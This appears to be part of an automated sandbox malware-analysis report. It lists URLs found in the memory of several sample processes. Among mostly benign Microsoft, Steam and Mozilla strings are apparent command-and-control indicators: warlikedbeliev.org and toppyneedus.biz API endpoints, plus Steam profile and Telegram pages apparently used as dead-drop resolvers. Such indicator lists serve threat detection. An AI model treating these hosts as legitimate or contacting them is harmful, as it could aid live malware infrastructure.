Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770984937.0000028779957000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770690266.000002877992C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770789895.000002877995A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4524174012.000002877A029000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 0000000D.00000002.4525190291.000002877A081000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srf
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
Source: svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfuer
Source: svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfen
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfg
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: Avoiding.com, 0000001A.00000002.4530097484.0000000006394000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770690266.000002877992C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://signup.live.com/signup.aspx
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: 1639401074.exe, 0000001C.00000002.2943849456.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918096378.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/h
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918096378.000000000142D000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 1639401074.exe, 0000001C.00000002.2943849456.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918096378.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000002.2931698311.000000000142A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 1639401074.exe, 0000001C.00000002.2943849456.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918096378.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900P
Source: Avoiding.com, 0000001A.00000003.3503975469.00000000044CC000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4529278204.0000000004741000.00000040.00001000.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000003.3504805703.0000000004485000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4523822191.0000000004440000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000003.3504482908.0000000004441000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000003.3502930486.00000000044CD000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000003.3503586295.0000000003158000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000003.3498851432.0000000001701000.00000004.00000020.00020000.00000000.sdmp, 5ec73896e9.exe, 0000002E.00000002.3164079582.00000000035D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199820567237
Source: 5ec73896e9.exe, 0000002E.00000002.3164079582.00000000035D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199820567237hac22tlMozilla/5.0
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamloopback.host
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918096378.000000000142D000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: Avoiding.com, 0000001A.00000002.4534999621.0000000006959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Avoiding.com, 0000001A.00000002.4534999621.0000000006959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Avoiding.com, 0000001A.00000002.4520728051.0000000001699000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: Avoiding.com, 0000001A.00000002.4524811305.0000000004554000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000003.3503975469.00000000044CC000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4529278204.0000000004741000.00000040.00001000.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000003.3504805703.0000000004485000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4523822191.0000000004440000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000003.3504482908.0000000004441000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000003.3502930486.00000000044CD000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000003.3503586295.0000000003158000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000003.3498851432.0000000001701000.00000004.00000020.00020000.00000000.sdmp, 5ec73896e9.exe, 0000002E.00000002.3164079582.00000000035D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/m08mbk
Source: 5ec73896e9.exe, 0000002E.00000002.3164079582.00000000035D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/m08mbkhac22tlMozilla/5.0
Source: c153ad0ce0.exe, 00000009.00000002.2910784069.00000000033F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz/
Source: c153ad0ce0.exe, 00000009.00000002.2897884822.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, c153ad0ce0.exe, 00000009.00000002.2897884822.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz/api
Source: c153ad0ce0.exe, 00000009.00000002.2898964310.0000000000D36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz/pi
Source: c153ad0ce0.exe, 00000009.00000002.2897884822.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz:443/api
Source: regsvr32.exe, 00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_see
Source: regsvr32.exe, 00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_seeaCould
Source: DbCMTMgeJo.exe, 00000000.00000003.2146220338.0000000001777000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/
Source: DbCMTMgeJo.exe, 00000000.00000003.2068420107.000000000171D000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2068060322.0000000001705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/027Z
Source: DbCMTMgeJo.exe, 00000000.00000003.2104690253.0000000001777000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2105985714.0000000001777000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2068420107.000000000171D000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2068354057.00000000016F9000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2068060322.0000000001705000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2146513792.0000000001705000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2163228888.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2163268870.000000000171D000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2068060322.00000000016F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/api
Source: DbCMTMgeJo.exe, 00000000.00000003.2103686396.0000000005DA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/api1-3
Source: DbCMTMgeJo.exe, 00000000.00000003.2163205386.0000000005DAC000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2134687735.0000000005DAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apiSta
Source: DbCMTMgeJo.exe, 00000000.00000003.2145907492.0000000005DAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apiStajS
Source: DbCMTMgeJo.exe, 00000000.00000003.2119261142.0000000005DAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apis
Source: DbCMTMgeJo.exe, 00000000.00000003.2104690253.0000000001777000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2105985714.0000000001777000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/c
Source: DbCMTMgeJo.exe, 00000000.00000003.2104690253.0000000001777000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2105985714.0000000001777000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/k
Source: DbCMTMgeJo.exe, 00000000.00000003.2146220338.000000000175D000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2210581252.0000000001764000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2122311529.0000000001764000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2162987738.0000000001767000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2104690253.0000000001755000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2146427146.0000000001764000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2105985714.0000000001758000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/z
Source: DbCMTMgeJo.exe, 00000000.00000003.2134687735.0000000005DAC000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2104647917.0000000005DAA000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2106302389.0000000005DAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org:443/apiicrosoft
Source: Avoiding.com, 0000001A.00000002.4524811305.0000000004554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: DbCMTMgeJo.exe, 00000000.00000003.2106302389.0000000005DAA000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4526202507.0000000004731000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: DbCMTMgeJo.exe, 00000000.00000003.2106302389.0000000005DAA000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4526202507.0000000004731000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: DbCMTMgeJo.exe, 00000000.00000003.2075049522.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2075267820.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2074800983.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4526202507.0000000004641000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000003.3815074409.000000001C1A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: DbCMTMgeJo.exe, 00000000.00000003.2075049522.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2075267820.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2074800983.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4526202507.0000000004641000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4530729249.0000000006574000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4525258336.0000000012643000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000003.3815074409.000000001C1A1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: Avoiding.com, 0000001A.00000002.4534999621.0000000006959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Avoiding.com, 0000001A.00000002.4534999621.0000000006959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: DbCMTMgeJo.exe, 00000000.00000003.2106040757.0000000005EBC000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4534999621.0000000006959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Avoiding.com, 0000001A.00000002.4534999621.0000000006959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: DbCMTMgeJo.exe, 00000000.00000003.2106040757.0000000005EBC000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4534999621.0000000006959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: DbCMTMgeJo.exe, 00000000.00000003.2106040757.0000000005EBC000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4534999621.0000000006959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: regsvr32.exe, 00000022.00000003.3751914736.0000000014694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: regsvr32.exe, 00000022.00000002.4535613138.000000001C740000.00000004.08000000.00040000.00000000.sdmp, regsvr32.exe, 00000022.00000003.3784415191.0000000013530000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp, regsvr32.exe, 00000022.00000003.3751914736.0000000014694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
